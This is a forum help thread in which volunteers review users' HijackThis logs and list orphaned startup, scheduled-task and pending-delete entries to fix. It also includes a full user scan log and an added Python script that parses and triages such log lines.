To analyse problems on your system caused by performance drops, freezes, malware effects and application errors, and to improve performance and neutralise the effects of malware, you need to share here the log of a scan you have made with the HijackThis software.

Usage:

1) Download the current version, to which a developer has added new features, from here, and extract the application from the archive file to your desktop.

Alternative: Download HiJackThis Fork - MajorGeeks

Old version: HiJackThis | Free software downloads at SourceForge.net

2) Restart your computer and wait 3 minutes without doing anything.

3) Right-click the HijackThis program and run it as administrator (not applicable to XP).

4) In the window that opens, click the "Do a system scan and save a log file" button.

5) The HijackThis scan will start automatically; do not use the mouse or keyboard until the scan has completed.

6) When the scan completes, a log file containing the HijackThis report will appear.



*7) So that we can review the log file, you need to add it here from the reply section.

Click "Code".

Paste the contents of the log into the blue box and press the "Continue" button.

Warning: If you have trouble adding code on the site, you need to paste your code into one of the sites given below and share the link. In that case, do not use option *7 for now.

Paste ofCode

8) Also, reply to the thread describing in detail the problem on your system (performance drop, suspected malware presence, etc.).
(Those who do not do this will not get a reply)

Fixing:

When I or one of the experts replies in the thread, tick the boxes at the start of the lines we name in the HijackThis application interface. Then press the "Fix checked" button.

You're welcome; I replied very late, sorry. It's because I can't check social media much.
Uninstall the IObit software.
Update your PDF and printer versions, if any.
You have used a driver finder; this can also cause problems, so uninstall it and never use it.
Apart from these, there is no problem that would affect the issue you mentioned.
Check things like your e-mail and phone from here and take your precautions.

Fix these:
Code:
O22 - Tasks: \Microsoft\Windows\EnterpriseMgmt\9465BB34-975D-4D4D-A43E-3ADEDB56F399\OS Edition Upgrade event listener created by enrollment client - C:\Windows\system32\deviceenroller.exe /s "9465BB34-975D-4D4D-A43E-3ADEDB56F399" /c /OsEditionUpgradeAlert /SID "S-1-5-21-558626871-841166075-3276843811-1001" (sign: 'Microsoft')
O22 - Tasks: \Microsoft\Windows\EnterpriseMgmt\9465BB34-975D-4D4D-A43E-3ADEDB56F399\Passport for Work alert created by enrollment client - C:\Windows\system32\deviceenroller.exe /o "9465BB34-975D-4D4D-A43E-3ADEDB56F399" /c /PFW (sign: 'Microsoft')
O22 - Tasks: \Microsoft\Windows\EnterpriseMgmt\9465BB34-975D-4D4D-A43E-3ADEDB56F399\Provisioning initiated session - C:\Windows\system32\deviceenroller.exe /c /ProvInitiatedSession /o "9465BB34-975D-4D4D-A43E-3ADEDB56F399" (sign: 'Microsoft')
O22 - Tasks: \Microsoft\Windows\EnterpriseMgmt\9465BB34-975D-4D4D-A43E-3ADEDB56F399\PushLaunch - C:\Windows\system32\deviceenroller.exe /o "9465BB34-975D-4D4D-A43E-3ADEDB56F399" /c /z (sign: 'Microsoft')
O22 - Tasks: \Microsoft\Windows\EnterpriseMgmt\9465BB34-975D-4D4D-A43E-3ADEDB56F399\PushRenewal - C:\Windows\system32\deviceenroller.exe /o "9465BB34-975D-4D4D-A43E-3ADEDB56F399" /c /y (sign: 'Microsoft')
O22 - Tasks: \Microsoft\Windows\EnterpriseMgmt\9465BB34-975D-4D4D-A43E-3ADEDB56F399\Refresh schedule created by Declared Configuration to refresh any settings changed on the device - C:\Windows\system32\deviceenroller.exe /c /DeclaredConfigurationRefresh /o 9465BB34-975D-4D4D-A43E-3ADEDB56F399 (sign: 'Microsoft')
O22 - Tasks: \Microsoft\Windows\EnterpriseMgmt\9465BB34-975D-4D4D-A43E-3ADEDB56F399\Schedule #1 created by enrollment client - C:\Windows\system32\deviceenroller.exe /o "9465BB34-975D-4D4D-A43E-3ADEDB56F399" /c (sign: 'Microsoft')
O22 - Tasks: \Microsoft\Windows\EnterpriseMgmt\9465BB34-975D-4D4D-A43E-3ADEDB56F399\Schedule #2 created by enrollment client - C:\Windows\system32\deviceenroller.exe /o "9465BB34-975D-4D4D-A43E-3ADEDB56F399" /c (sign: 'Microsoft')
O22 - Tasks: \Microsoft\Windows\EnterpriseMgmt\9465BB34-975D-4D4D-A43E-3ADEDB56F399\Schedule #3 created by enrollment client - C:\Windows\system32\deviceenroller.exe /o "9465BB34-975D-4D4D-A43E-3ADEDB56F399" /c /b (sign: 'Microsoft')
O22 - Tasks: \Microsoft\Windows\EnterpriseMgmt\9465BB34-975D-4D4D-A43E-3ADEDB56F399\Schedule created by enrollment client for renewal of certificate warning - C:\Windows\system32\deviceenroller.exe /c /r /d 9465BB34-975D-4D4D-A43E-3ADEDB56F399 (sign: 'Microsoft')
O22 - Tasks: \Microsoft\Windows\EnterpriseMgmt\9465BB34-975D-4D4D-A43E-3ADEDB56F399\Schedule to run OMADMClient by client - C:\Windows\system32\omadmclient.exe /serverid "9465BB34-975D-4D4D-A43E-3ADEDB56F399" /lookuptype 1 /initiator 0 (sign: 'Microsoft')
O22 - Tasks: \Microsoft\Windows\EnterpriseMgmt\9465BB34-975D-4D4D-A43E-3ADEDB56F399\Schedule to run OMADMClient by server - C:\Windows\system32\omadmclient.exe /serverid "9465BB34-975D-4D4D-A43E-3ADEDB56F399" /lookuptype 1 /initiator 1 (sign: 'Microsoft')
O22 - Tasks: \Microsoft\Windows\EnterpriseMgmt\9465BB34-975D-4D4D-A43E-3ADEDB56F399\Win10 S Mode event listener created by enrollment client - C:\Windows\system32\deviceenroller.exe /s "9465BB34-975D-4D4D-A43E-3ADEDB56F399" /c /Win10SModeAlert /SID "S-1-5-21-558626871-841166075-3276843811-1001" (sign: 'Microsoft')


Those are usually the records of software that has been removed; MS still hasn't found a proper solution for this. So don't think of them only as malicious.

Thank you for your good wishes, the same to you :)

The source of the ones in the picture is that you are using, or have used, software from a company called Appsflyer. As far as I could find out, if you have used TRT applications, tabii, etc., it comes from there.

Fix these:
Code:
O4 - HKCU\..\StartupApproved\Run: [AF_counter_2139460] = 3 (file missing) (2024/12/04)
O4 - HKCU\..\StartupApproved\Run: [AF_uuid_2139460] = 29a8f2ca-673c-4493-be4b-36376ee9d90f (file missing) (2024/12/04)

There are also a number of unfamiliar items under the name Gaomon Tablet; if you don't use a tablet or similar device, uninstall it.


You should have read the rules before asking. In that case, I'm having you fix the ones I see as problematic:
Code:
O4 - HKLM\..\Session Manager: [PendingFileRenameOperations] = C:\Users\JC\AppData\Local\Kingsoft\ -> DELETE
O4 - HKLM\..\Session Manager: [PendingFileRenameOperations] = C:\Users\JC\AppData\Local\Kingsoft\WPS Office\ -> DELETE
O4 - HKLM\..\Session Manager: [PendingFileRenameOperations] = C:\Users\JC\AppData\Local\Kingsoft\WPS Office\12.2.0.19307\ -> DELETE
O4 - HKLM\..\Session Manager: [PendingFileRenameOperations] = C:\Users\JC\AppData\Local\Kingsoft\WPS Office\12.2.0.19307\office6\ -> DELETE
O4 - HKLM\..\Session Manager: [PendingFileRenameOperations] = C:\Users\JC\AppData\Local\Kingsoft\WPS Office\12.2.0.19307\office6\ -> DELETE
O4 - HKLM\..\Session Manager: [PendingFileRenameOperations] = C:\Users\JC\AppData\Local\Kingsoft\WPS Office\12.2.0.19307\office6\kwpsmenushellext64.dll_d_242859 -> DELETE (size: 700288 bytes, SHA256: FEE7C5EFF461EBAF708D889F0D8AF8C0290BBE59AEAF68BA41E8C61BFA847D37)
O4 - HKLM\..\Session Manager: [PendingFileRenameOperations] = C:\Users\JC\AppData\Local\Temp\_iu14D2N.tmp -> DELETE (size: 1343048 bytes, SHA256: 5761E7789D813626CD68EE1E62429CFEB92BDD814CD29EF12FC4AE9EC1DBAFF3)
O4 - HKLM\..\Session Manager: [PendingFileRenameOperations] = C:\Users\JC\AppData\Local\Temp\~nsu.tmp -> DELETE (file missing)
O4 - HKLM\..\Session Manager: [PendingFileRenameOperations] = C:\Users\JC\AppData\Local\Temp\~nsu.tmp\Au_.exe -> DELETE (size: 165590 bytes, SHA256: E608BB67286BF3B1DC26FA0CE941B92E1768948AE33B19904AA68CD435048A8C)
O4 - HKLM\..\Session Manager: [PendingFileRenameOperations] = C:\Users\JC\AppData\Local\Temp\~nsuA.tmp -> DELETE (file missing)
O4 - HKLM\..\Session Manager: [PendingFileRenameOperations] = C:\Users\JC\AppData\Local\Temp\~nsuA.tmp -> DELETE (file missing)
O4 - HKLM\..\Session Manager: [PendingFileRenameOperations] = C:\Users\JC\AppData\Local\Temp\~nsuA.tmp -> DELETE (file missing)
O4 - HKLM\..\Session Manager: [PendingFileRenameOperations] = C:\Users\JC\AppData\Local\Temp\~nsuA.tmp\Un_A.exe -> DELETE (size: 182728 bytes, SHA256: EAA828B809A3FCEA92C11ABEE56492478B7E528E42F4AD44821012F9EC8CCEF4)
O4 - HKLM\..\Session Manager: [PendingFileRenameOperations] = C:\Users\JC\AppData\Local\Temp\~nsuA.tmp\Un_B.exe -> DELETE (size: 778649 bytes, SHA256: 3FA2BFC21DB85D537636D09CE543631639EC85404E7A77E1F966F7BCDDAFB5EE)
O4 - HKLM\..\Session Manager: [PendingFileRenameOperations] = C:\Users\JC\AppData\Local\Temp\~nsuA.tmp\Un_C.exe -> DELETE (size: 103394 bytes, SHA256: A6457CA8F7A14BA363E6F8467C020E62425EEEC755EE1C7A57068E8952C16672)
O4 - HKLM\..\Session Manager: [PendingFileRenameOperations] = C:\Users\JC\AppData\Local\Temp\nss6DBF.tmp\ -> DELETE
O4 - HKLM\..\Session Manager: [PendingFileRenameOperations] = C:\Users\JC\AppData\Roaming\Kingsoft\wps\ -> DELETE
O4 - HKLM\..\Session Manager: [PendingFileRenameOperations] = C:\Users\JC\AppData\Roaming\Kingsoft\wps\dcsdk\ -> DELETE
O4 - HKLM\..\Session Manager: [PendingFileRenameOperations] = C:\Users\JC\AppData\Roaming\Kingsoft\wps\dcsdk\cache.db -> DELETE (size: 16777216 bytes, SHA256: 1C2FE331253D58662539A7C8BD820BDDA655E2A7EBB3A198FC3C8BB969093EC2)


You, too, have posted without reading the rules.
From what I can see, there doesn't appear to be a problem.
Thank you, sir. May your work go well.
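
The fix lists in the replies above are individual HijackThis log lines. As an added example (not part of the original thread and not HijackThis's own code), the Python below parses lines of that shape into section code, value name, orphan markers, signer, size and SHA256, so the orphaned entries and the hashes worth looking up can be listed before anything is ticked; the sample log, its paths and its hash are constructed.

```python
import re
from collections import Counter
from dataclasses import dataclass
from typing import List, Optional

# "<section code> - <body>", e.g. "O4 - HKLM\..\Run: [name] command".
ENTRY_RE = re.compile(r"^(?P<code>[A-Z]\d{1,2}) - (?P<body>.*)$")
NAME_RE = re.compile(r"\[([^\]]+)\]")             # value name in [brackets]
SIGN_RE = re.compile(r"\(sign: '([^']*)'\)")      # signer annotation
SIZE_RE = re.compile(r"size: (\d+) bytes")
SHA256_RE = re.compile(r"SHA256: ([0-9A-Fa-f]{64})\b")
ORPHAN_MARKERS = ("(file missing)", "(no file)")

# Constructed sample modelled on the line formats quoted in this thread.
SAMPLE_LOG = r"""Logfile of HiJackThis (constructed sample)
Running processes:
C:\Program Files\Example\app.exe
O3 - Toolbar: (no name) - {00000000-0000-0000-0000-000000000000} - (no file)
O4 - HKCU\..\StartupApproved\Run: [EX_counter_1] = 3 (file missing) (2024/01/01)
O4 - HKLM\..\Session Manager: [PendingFileRenameOperations] = C:\Users\user\AppData\Local\Temp\~ex.tmp -> DELETE (file missing)
O4 - HKLM\..\Session Manager: [PendingFileRenameOperations] = C:\Users\user\AppData\Local\Temp\~ex.tmp -> DELETE (file missing)
O4 - HKLM\..\Session Manager: [PendingFileRenameOperations] = C:\Users\user\AppData\Local\Temp\~ex.tmp\Un_A.exe -> DELETE (size: 182728 bytes, SHA256: 0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF)
O22 - Tasks: \Example\Vendor\Refresh - C:\Windows\system32\example.exe /c (sign: 'Microsoft')
O23 - Service: Example Service (ExampleSvc) - Unknown owner - C:\Program Files\Example\svc.exe (file missing)
"""


@dataclass(frozen=True)
class Entry:
    code: str               # section code such as O4 or O23
    body: str               # everything after "<code> - "
    name: Optional[str]     # first [bracketed] name, if any
    orphaned: bool          # target reported as missing
    signer: Optional[str]
    size: Optional[int]
    sha256: Optional[str]


def _first(rx, text):
    m = rx.search(text)
    return m.group(1) if m else None


def parse_line(line: str) -> Optional[Entry]:
    """Return an Entry for a log entry line, None for headers and process paths."""
    m = ENTRY_RE.match(line.strip())
    if not m:
        return None
    body = m.group("body")
    size = _first(SIZE_RE, body)
    return Entry(
        code=m.group("code"),
        body=body,
        name=_first(NAME_RE, body),
        orphaned=any(marker in body for marker in ORPHAN_MARKERS),
        signer=_first(SIGN_RE, body),
        size=int(size) if size else None,
        sha256=_first(SHA256_RE, body),
    )


def parse_log(text: str) -> List[Entry]:
    """Parse a whole log, dropping lines that repeat verbatim."""
    seen, entries = set(), []
    for line in text.splitlines():
        entry = parse_line(line)
        if entry and entry not in seen:
            seen.add(entry)
            entries.append(entry)
    return entries


def triage(entries: List[Entry]) -> dict:
    """Group what a reviewer looks at first; the decision stays with the reviewer."""
    return {
        "per_section": Counter(e.code for e in entries),
        "orphaned": [e for e in entries if e.orphaned],
        "hashes_to_look_up": [(e.sha256, e.size) for e in entries if e.sha256],
    }


if __name__ == "__main__":
    report = triage(parse_log(SAMPLE_LOG))
    print(dict(report["per_section"]))
    for e in report["orphaned"]:
        print("orphaned:", e.code, e.body)
    for digest, size in report["hashes_to_look_up"]:
        print("look up:", digest, size)
```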
 
Code:
Logfile of Trend Micro HijackThis v2.0.5
Scan saved at 02:18:54, on 17.02.2025
Platform: Unknown Windows (WinNT 6.02.1008)
MSIE: Internet Explorer v11.0 (11.00.22621.3527)


Boot mode: Normal

Running processes:
C:\Program Files (x86)\ASUS\ArmouryDevice\dll\AcPowerNotification\AcPowerNotification.exe
C:\Program Files (x86)\ASUS\ArmouryDevice\asus_framework.exe
C:\Program Files (x86)\NVIDIA Corporation\NvNode\NVIDIA Web Helper.exe
C:\Program Files (x86)\ASUS\ArmouryDevice\asus_framework.exe
C:\Program Files (x86)\ASUS\ArmouryDevice\asus_framework.exe
C:\Program Files (x86)\ASUS\ArmouryDevice\dll\SwAgent\ArmourySwAgent.exe
C:\Program Files (x86)\ASUS\ArmouryDevice\asus_framework.exe
C:\Program Files (x86)\Internet Download Manager\IDMan.exe
C:\Users\ahmet\OneDrive\Desktop\HijackThis.exe

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=625119&clocalename=tr-TR
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/p/?LinkId=255141
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/p/?LinkId=255141
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant =
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,CustomizeSearch =
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Local Page = %11%\blank.htm
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Local Page = C:\Windows\SysWOW64\blank.htm
R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,ProxyOverride = *.local
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName =
F2 - REG:system.ini: UserInit=
O1 - Hosts: ::1 localhost
O2 - BHO: IDM Helper - {0055C089-8582-441B-A0BF-17B458C2A3A8} - C:\Program Files (x86)\Internet Download Manager\IDMIECC.dll
O2 - BHO: IEToEdge BHO - {1FD49718-1D00-4B19-AF5F-070AF6D5D54C} - C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\BHO\ie_to_edge_bho.dll
O2 - BHO: Lync Click to Call BHO - {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\OCHelper.dll
O2 - BHO: Bing Bar Helper - {d2ce3e00-f94a-4740-988e-03dc2f38c34f} - C:\Program Files (x86)\Microsoft\BingBar\7.1.355.0\BingExt.dll
O3 - Toolbar: Bing Bar - {8dcb7100-df86-4384-8842-8fa844297b3f} - "C:\Program Files (x86)\Microsoft\BingBar\7.1.355.0\BingExt.dll" (file missing)
O3 - Toolbar: (no name) - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - (no file)
O4 - HKLM\..\Run: [HP Software Update] C:\Program Files (x86)\Hp\HP Software Update\HPWuSchd2.exe
O4 - HKLM\..\Run: [RazerCortex] "C:\Program Files (x86)\Razer\Razer Cortex\RazerCortex.exe" -autorun
O4 - HKLM\..\Run: [EpicPen] "C:\Program Files (x86)\Epic Pen\EpicPen.exe" -startup
O4 - HKCU\..\Run: [OneDrive] "C:\Program Files\Microsoft OneDrive\OneDrive.exe" /background
O4 - HKCU\..\Run: [Opera GX Stable] C:\Users\ahmet\AppData\Local\Programs\Opera GX\opera.exe
O4 - HKCU\..\Run: [RiotClient] C:\Riot Games\Riot Client\RiotClientServices.exe --launch-background-mode
O4 - HKCU\..\Run: [IDMan] C:\Program Files (x86)\Internet Download Manager\IDMan.exe /onboot
O4 - HKCU\..\Run: [Steam] "C:\Program Files (x86)\Steam\steam.exe" -silent
O4 - HKCU\..\Run: [EpicGamesLauncher] "C:\Program Files (x86)\Epic Games\Launcher\Portal\Binaries\Win64\EpicGamesLauncher.exe" -silent -launchcontext=boot
O4 - HKCU\..\Run: [Opera GX Browser Assistant] C:\Users\ahmet\AppData\Local\Programs\Opera GX\assistant\browser_assistant.exe
O4 - HKCU\..\Run: [MicrosoftEdgeAutoLaunch_734FEFB1E41B958571F346D2AA30EFBA] "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start
O4 - HKCU\..\Run: [com.blitz.app] "C:\Users\ahmet\AppData\Local\Programs\Blitz\Blitz.exe" --autostart
O4 - HKCU\..\Run: [Discord] "C:\Users\ahmet\AppData\Local\Discord\Update.exe" --processStart Discord.exe
O4 - HKCU\..\Run: [EADM] "C:\Program Files\Electronic Arts\EA Desktop\EA Desktop\EALauncher.exe" -silent
O4 - HKCU\..\Run: [Spotify] C:\Users\ahmet\AppData\Roaming\Spotify\Spotify.exe --autostart --minimized
O4 - HKCU\..\Run: [Proton Drive] "C:\Users\ahmet\AppData\Local\Programs\Proton\Drive\ProtonDrive.exe" -quiet
O4 - HKCU\..\Run: [Synapse3] C:\Program Files (x86)\Razer\Synapse3\WPFUI\Framework\Razer Synapse 3 Host\Razer Synapse 3.exe /StartMinimized
O4 - HKCU\..\Run: [LGHUB] "C:\Program Files\LGHUB\system_tray\lghub_system_tray.exe" --minimized
O4 - HKUS\S-1-5-19\..\Run: [OneDriveSetup] C:\Windows\System32\OneDriveSetup.exe /thfirstsetup (User 'Local Service')
O4 - HKUS\S-1-5-20\..\Run: [OneDriveSetup] C:\Windows\System32\OneDriveSetup.exe /thfirstsetup (User 'NETWORK SERVICE')
O4 - HKUS\S-1-5-18\..\Run: [Norton Download ManagerFORCE_UPGRADE_22_22_9] C:\PROGRA~3\Norton\{0C55C~1\NORTON~1.EXE /m /noui /instversion "22.22.9" (User 'SYSTEM')
O4 - HKUS\.DEFAULT\..\Run: [Norton Download ManagerFORCE_UPGRADE_22_22_9] C:\PROGRA~3\Norton\{0C55C~1\NORTON~1.EXE /m /noui /instversion "22.22.9" (User 'Default user')
O8 - Extra context menu item: E&xport to Microsoft Excel - res://C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE/3000
O8 - Extra context menu item: IDM ile indir - C:\Program Files (x86)\Internet Download Manager\IEExt.htm
O9 - Extra button: Lync Click to Call - {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\OCHelper.dll
O9 - Extra 'Tools' menuitem: Lync Click to Call - {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\OCHelper.dll
O10 - Unknown file in Winsock LSP: c:\windows\system32\nlansp_c.dll
O11 - Options group: [ACCELERATED_GRAPHICS] Accelerated graphics
O17 - HKLM\System\CCS\Services\Tcpip\..\{7c0cd90e-7128-46ae-a69d-b86111e86750}: NameServer = 1.1.1.1,1.0.0.1
O18 - Protocol: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\MSOSB.DLL
O18 - Protocol: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\MSOSB.DLL
O18 - Protocol: osf-roaming.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\MSOSB.DLL
O18 - Protocol: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\MSOSB.DLL
O18 - Protocol: tbauth - {14654CA6-5711-491D-B89A-58E571679951} - C:\Windows\SysWOW64\tbauth.dll
O18 - Protocol: windows.tbauth - {14654CA6-5711-491D-B89A-58E571679951} - C:\Windows\SysWOW64\tbauth.dll
O18 - Filter hijack: text/xml - {807583E5-5146-11D5-A672-00B0D022E945} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLMF.DLL
O23 - Service: @%SystemRoot%\system32\Alg.exe,-112 (ALG) - Unknown owner - C:\Windows\System32\alg.exe (file missing)
O23 - Service: ARMOURY CRATE Service (ArmouryCrateService) - ASUSTeK COMPUTER INC. - C:\Program Files\ASUS\ARMOURY CRATE Lite Service\ArmouryCrate.Service.exe
O23 - Service: ASUS Com Service (asComSvc) - ASUSTeK Computer Inc. - C:\Program Files (x86)\ASUS\AXSP\4.02.23\atkexComSvc.exe
O23 - Service: ASUS G ncelleme Hizmeti (asus) (asus) - ASUSTeK Computer Inc. - C:\Program Files (x86)\ASUS\Update\AsusUpdate.exe
O23 - Service: AsusCertService - ASUSTek COMPUTER INC. - C:\Program Files (x86)\ASUS\AsusCertService\AsusCertService.exe
O23 - Service: AsusFanControlService - ASUSTeK Computer Inc. - C:\Program Files (x86)\ASUS\AsusFanControlService\2.03.20\AsusFanControlService.exe
O23 - Service: ASUS G ncelleme Hizmeti (asusm) (asusm) - ASUSTeK Computer Inc. - C:\Program Files (x86)\ASUS\Update\AsusUpdate.exe
O23 - Service: AsusUpdateCheck - Unknown owner - C:\Windows\System32\AsusUpdateCheck.exe (file missing)
O23 - Service: BattlEye Service (BEService) - Unknown owner - C:\Program Files (x86)\Common Files\BattlEye\BEService.exe
O23 - Service: Bonjour Service - Apple Inc. - C:\Program Files\Bonjour\mDNSResponder.exe
O23 - Service: CortexLauncherService - Razer Inc. - C:\Program Files (x86)\Razer\Razer Cortex\CortexLauncherService.exe
O23 - Service: @%SystemRoot%\system32\CredentialEnrollmentManager.exe,-100 (CredentialEnrollmentManagerUserSvc) - Unknown owner - C:\Windows\system32\CredentialEnrollmentManager.exe (file missing)
O23 - Service: CredentialEnrollmentManagerUserSvc_452ae - Unknown owner - C:\Windows\system32\CredentialEnrollmentManager.exe (file missing)
O23 - Service: @%SystemRoot%\system32\DiagSvcs\DiagnosticsHub.StandardCollector.ServiceRes.dll,-1000 (diagnosticshub.standardcollector.service) - Unknown owner - C:\Windows\system32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe (file missing)
O23 - Service: EAAntiCheatService - Electronic Arts - C:\Program Files\EA\AC\eaanticheat.gameservice.exe
O23 - Service: EABackgroundService - Electronic Arts - C:\Program Files\Electronic Arts\EA Desktop\EA Desktop\EABackgroundService.exe
O23 - Service: Easy Anti-Cheat (Epic Online Services) (EasyAntiCheat_EOS) - Epic Games, Inc. - C:\Program Files (x86)\EasyAntiCheat_EOS\EasyAntiCheat_EOS.exe
O23 - Service: @%SystemRoot%\system32\efssvc.dll,-100 (EFS) - Unknown owner - C:\Windows\System32\lsass.exe (file missing)
O23 - Service: Epic Online Services (EpicOnlineServices) - Epic Games, Inc. - C:\Program Files (x86)\Epic Games\Epic Online Services\service\EpicOnlineServicesHost.exe
O23 - Service: NVIDIA FrameView SDK service (FvSvc) - NVIDIA - C:\Program Files\NVIDIA Corporation\FrameViewSDK\nvfvsdksvc_x64.exe
O23 - Service: @%systemroot%\system32\GameInputSvc.exe,-101 (GameInputSvc) - Unknown owner - C:\Windows\System32\GameInputSvc.exe (file missing)
O23 - Service: HP Print Scan Doctor Service (HPPrintScanDoctorService) - HP Inc. - C:\Program Files\HPPrintScanDoctor\HPPrintScanDoctorService.exe
O23 - Service: @oem55.inf,%PlatformLicenseManagerServiceName%;Intel(R) Platform License Manager Service (Intel(R) Platform License Manager Service) - Intel(R) Corporation - C:\Windows\System32\DriverStore\FileRepository\iclsclient.inf_amd64_fc84dfa25a6a7727\lib\PlatformLicenseManagerService.exe
O23 - Service: Intel(R) Dynamic Application Loader Host Interface Service (jhi_service) - Intel Corporation - C:\Windows\System32\DriverStore\FileRepository\dal.inf_amd64_af50fdb80983f7bc\jhi_service.exe
O23 - Service: @keyiso.dll,-100 (KeyIso) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: LGHUB Updater Service (LGHUBUpdaterService) - Logitech, Inc. - C:\Program Files\LGHUB\lghub_updater.exe
O23 - Service: @oem7.inf,%logi_lamparray_service.SvcName%;Logitech LampArray Service (logi_lamparray_service) - Logitech, Inc. - C:\Windows\System32\DriverStore\FileRepository\logi_lamparray_usb.inf_amd64_3786a31d1dad269d\logi_lamparray_service.exe
O23 - Service: @comres.dll,-2797 (MSDTC) - Unknown owner - C:\Windows\System32\msdtc.exe (file missing)
O23 - Service: @%SystemRoot%\System32\netlogon.dll,-102 (Netlogon) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: NVIDIA LocalSystem Container (NvContainerLocalSystem) - NVIDIA Corporation - C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
O23 - Service: NVIDIA Display Container LS (NVDisplay.ContainerLocalSystem) - NVIDIA Corporation - C:\Windows\System32\DriverStore\FileRepository\nv_dispig.inf_amd64_0afec3f2050014a0\Display.NvContainer\NVDisplay.Container.exe
O23 - Service: @%systemroot%\system32\PerceptionSimulation\PerceptionSimulationService.exe,-101 (perceptionsimulation) - Unknown owner - C:\Windows\system32\PerceptionSimulation\PerceptionSimulationService.exe (file missing)
O23 - Service: ProtonVPN Service - Unknown owner - C:\Program Files\Proton\VPN\v3.2.11\ProtonVPNService.exe (file missing)
O23 - Service: Razer Game Manager (Razer Game Manager Service) - Razer Inc - C:\Program Files (x86)\Razer\Razer Services\GMS\GameManagerService.exe
O23 - Service: Razer Game Manager Service 3 - Razer Inc - C:\Program Files (x86)\Razer\Razer Services\GMS3\GameManagerService3.exe
O23 - Service: Razer Synapse Service - Unknown owner - C:\Program Files (x86)\Razer\Synapse3\Service\Razer Synapse Service.exe (file missing)
O23 - Service: Razer Update Service - Razer - C:\Program Files (x86)\Razer\RzUpdateEngineService\RzUpdateEngineService.exe
O23 - Service: Rockstar Game Library Service (Rockstar Service) - Rockstar Games - C:\Program Files\Rockstar Games\Launcher\RockstarService.exe
O23 - Service: @%systemroot%\system32\Locator.exe,-2 (RpcLocator) - Unknown owner - C:\Windows\system32\locator.exe (file missing)
O23 - Service: Razer Central Service (RzActionSvc) - Razer Inc. - C:\Program Files (x86)\Razer\Razer Services\Razer Central\RazerCentralService.exe
O23 - Service: @%SystemRoot%\system32\samsrv.dll,-1 (SamSs) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: @%systemroot%\system32\SecurityHealthAgent.dll,-1002 (SecurityHealthService) - Unknown owner - C:\Windows\system32\SecurityHealthService.exe (file missing)
O23 - Service: @%ProgramFiles%\Windows Defender Advanced Threat Protection\MsSense.exe,-1001 (Sense) - Unknown owner - C:\Program Files (x86)\Windows Defender Advanced Threat Protection\MsSense.exe (file missing)
O23 - Service: @%SystemRoot%\system32\SensorDataService.exe,-101 (SensorDataService) - Unknown owner - C:\Windows\System32\SensorDataService.exe (file missing)
O23 - Service: @firewallapi.dll,-50323 (SNMPTrap) - Unknown owner - C:\Windows\System32\snmptrap.exe (file missing)
O23 - Service: @%systemroot%\system32\spectrum.exe,-101 (spectrum) - Unknown owner - C:\Windows\system32\spectrum.exe (file missing)
O23 - Service: @%systemroot%\system32\spoolsv.exe,-1 (Spooler) - Unknown owner - C:\Windows\System32\spoolsv.exe (file missing)
O23 - Service: @%SystemRoot%\system32\sppsvc.exe,-101 (sppsvc) - Unknown owner - C:\Windows\system32\sppsvc.exe (file missing)
O23 - Service: Steam Client Service - Valve Corporation - C:\Program Files (x86)\Common Files\Steam\steamservice.exe
O23 - Service: @%SystemRoot%\system32\TieringEngineService.exe,-702 (TieringEngineService) - Unknown owner - C:\Windows\system32\TieringEngineService.exe (file missing)
O23 - Service: @%SystemRoot%\system32\vaultsvc.dll,-1003 (VaultSvc) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: @%SystemRoot%\system32\vds.exe,-100 (vds) - Unknown owner - C:\Windows\System32\vds.exe (file missing)
O23 - Service: vgc - Riot Games, Inc. - C:\Program Files\Riot Vanguard\vgc.exe
O23 - Service: @%systemroot%\system32\vssvc.exe,-102 (VSS) - Unknown owner - C:\Windows\system32\vssvc.exe (file missing)
